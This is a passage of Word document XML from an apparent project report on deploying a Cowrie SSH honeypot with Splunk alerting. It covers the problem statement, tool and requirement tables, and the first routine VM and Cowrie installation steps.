        <w:t>The findings confirm that automated attackers follow a predictable, detectable playbook — and that deception technology, even at minimal cost and complexity, transforms that predictability from an organisational vulnerability into a defensive advantage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2165C4" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="0E49DFA1" w14:textId="23EC3763" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc231686537"/>
      <w:r>
        <w:t>1.2 Statement of Problem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4314EBA5" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Organisations remain dangerously blind to attacker behaviour despite deploying perimeter defences. Firewalls block threats but reveal nothing about attacker intent, tools, or techniques — leaving defenders perpetually reactive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A0EFB6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The scale is significant. In 2024, Cloudflare reported mitigating over 21.3 million DDoS attacks, while IBM's 2024 Cost of a Data Breach Report recorded the global average breach cost at $4.88 million — the highest ever documented. Rapid7 confirmed that exposed SSH services receive automated attack attempts within 90 seconds of going online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D18D9A1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>In January 2025, a European logistics company discovered attackers had silently harvested AWS credentials and database passwords from their servers for 47 days undetected — precisely the files this project's honeypot captured within seconds of simulated login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D61DE63" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This project directly addresses that visibility gap by deploying Cowrie — converting attacker activity from invisible threat into documented, analysable, actionable intelligence mapped against the MITRE ATT&amp;CK framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D6131" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="26A67DDA" w14:textId="38158ABC" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc231686538"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.3 How This Project Addresses the Problem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="5C36E125" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Where a firewall sees only a connection, this honeypot captured 9 successful logins, 7 attacker commands, fake AWS and database credentials being stolen, and triggered a real-time alert — transforming invisible threats into documented, actionable intelligence. The 2025 European logistics breach where attackers operated undetected for 47 days illustrates exactly the dwell-time problem this deployment's real-time Splunk alert directly counters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40683730" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="7919F1BE" w14:textId="1B711818" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc231686539"/>
      <w:r>
        <w:t>1.4 System Requirements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016DFB82"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735C06E6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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2C818F94" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Minimum Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="427106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565C6D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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24B643" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>512 MB (1 GB recommended)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="25E302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19E8A1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Disk Space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FE0A6E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10 GB free</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="1D64A8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0EA1265" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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D06FF9" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu Server 22.04 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="06DC0B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8E14A4" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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BAAF19" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NAT Network (default VirtualBox setting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="2D871F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B40646" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Python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F619468" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Python 3.x (pre-installed on Ubuntu 22.04)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33D4AEF7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="014906E9" w14:textId="5CB62264" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc231686540"/>
      <w:r>
        <w:t>1.5 Tools Used</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90"/>
        <w:gridCol w:w="2730"/>
        <w:gridCol w:w="2869"/>
      </w:tblGrid>
      <w:tr w:rsidR="0062444D" w14:paraId="34316941"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699ACF91" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Tool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7319CCFC" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>What It Is</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3FD9C6A6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose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20A6A5C0" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="39587E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69FA66C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cowrie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5C065D6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lightweight SSH/Telnet honeypot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0F8C1A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Captures attacker sessions and logs every command typed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C7E6E41" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>github.com/cowrie/cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="379725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09C5E8" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ubuntu Server 22.04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FA0229" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Linux operating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31D788" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Foundation the honeypot runs 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2640F7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ubuntu.com/download/server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="1A5A78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7E4E64" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VirtualBox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492293E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VM software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452457" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Safely isolates the honeypot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58FD7E7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>virtualbox.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="4D08D1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CEDB6A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Splunk 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C43B76" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SIEM and log analysis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2A026C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ingests Cowrie logs and builds attack dashboards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ABB9EE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>splunk.com/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>en_us</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/download</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="5E13F2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6544721" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AlienVault OTX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A39AA3C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Threat intelligence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1449332" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Look up attacker IPs to identify known threat actors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ECF9F02" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>otx.alienvault.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="7535FD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41A259" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VirusTotal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FDF809" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>File and IP scanner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216AF5" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Check any files dropped by attackers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10EBE2" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>virustotal.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="752B5F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346B953" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK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B407075" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker behaviour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2270109" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Classify attacker techniques using industry-standard codes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5F8984" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>attack.mitre.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BF0F87B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06795A62" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc231686541"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2. Environment Setup &amp; Honeypot Deployment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="788D10F4" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This phase covers the foundational infrastructure deployment — Ubuntu Server provisioning, Cowrie installation, port redirection configuration, and initial capture verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D0590D" w14:textId="4B66E891" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc231686542"/>
      <w:r>
        <w:t>2.1 Create the Ubuntu VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="11F51DAB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc231686543"/>
      <w:r>
        <w:t>Step 1 — Install VirtualBox and Create the VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="037FE9B7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Download and install VirtualBox from: virtualbox.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35B49F" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Download Ubuntu Server 22.04 LTS ISO from: ubuntu.com/download/server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F18DE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Open VirtualBox → click New → name </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'Honeypot'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49E613" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set Type = Linux, Version = Ubuntu 22.04 (64-bit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C3042" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set RAM to 1024 MB (1 GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A42726" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set disk to 10–15 GB (dynamically allocated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7EA81B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Under Network → Adapter 1 → leave as NAT Network (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390402B4" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Attach the Ubuntu ISO and complete the Ubuntu installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E886A2" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="1881ED7D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc231686544"/>
      <w:r>
        <w:t>Step 2 — Update Ubuntu After Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4B8098D2"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apt update &amp;&amp; </w:t>
      </w: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apt upgrade -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7383E9" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="2D985065" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc231686545"/>
      <w:r>
        <w:t>Step 3 — Install Cowrie Dependencies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="475108DC"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apt install -y git python3-venv python3-dev </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>libssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-dev </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>libffi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-dev build-essential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACDB56B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="10B58704" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc231686546"/>
      <w:r>
        <w:t>Step 4 — Create a Dedicated User for Cowrie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1F096053" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Cowrie must never run as root. Create an isolated system user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C108A6"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adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> --disabled-password cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1975A07F"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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AF9F5" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="64741354" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc231686547"/>
      <w:r>
        <w:t>Step 5 — Download and Install Cowrie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="541669DC"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git clone https://github.com/cowrie/cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE80FC9"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cd cowrie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B27D51"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 xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>venv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cowrie-env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E6A76"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source cowrie-env/bin/activate</w:t>
      </w:r>
    </w:p>
